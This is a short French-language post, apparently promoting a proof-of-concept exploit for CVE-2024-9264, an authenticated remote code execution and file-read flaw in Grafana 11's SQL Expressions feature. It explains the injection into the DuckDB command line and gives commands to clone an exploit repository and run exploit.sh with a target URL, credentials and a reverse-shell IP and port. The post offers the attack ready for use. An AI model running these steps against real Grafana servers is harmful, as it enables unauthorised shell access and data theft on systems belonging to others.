
RCE authentifié dans Grafana (v11.0) via les expressions SQL - Exploit PoC
RCE authentifiée dans Grafana (v11.0) via SQL Expressions - Exploit PoC
CVE-2024-9264 - Grafana v11.0
Exécution de code à distance authentifiée (RCE)
PoC
CVE-2024-9264 est une faille critique d'exécution de code à distance et d'inclusion de fichier local introduite dans la fonctionnalité expérimentale « SQL Expressions » de Grafana 11. L'API transmet les requêtes SQL fournies par l'utilisateur directement à l'interface en ligne de commande de DuckDB sans assainissement adéquat, de sorte que tout compte authentifié disposant de privilèges Viewer ou supérieurs peut injecter des commandes shell ou lire des fichiers arbitraires, à condition que le binaire duckdb soit dans le PATH du serveur.
git clone https://github.com/rvizx/CVE-2024-9264
cd CVE-2024-9264
chmod +x exploit.sh
# usage
usage: ./exploit.sh <grafana_url> <username> <password> <reverse_ip> <reverse_port>
Exemple :
./exploit.sh http://grafana.example.com admin LMCOP4X2?29DX2%332! 10.10.10.10 1337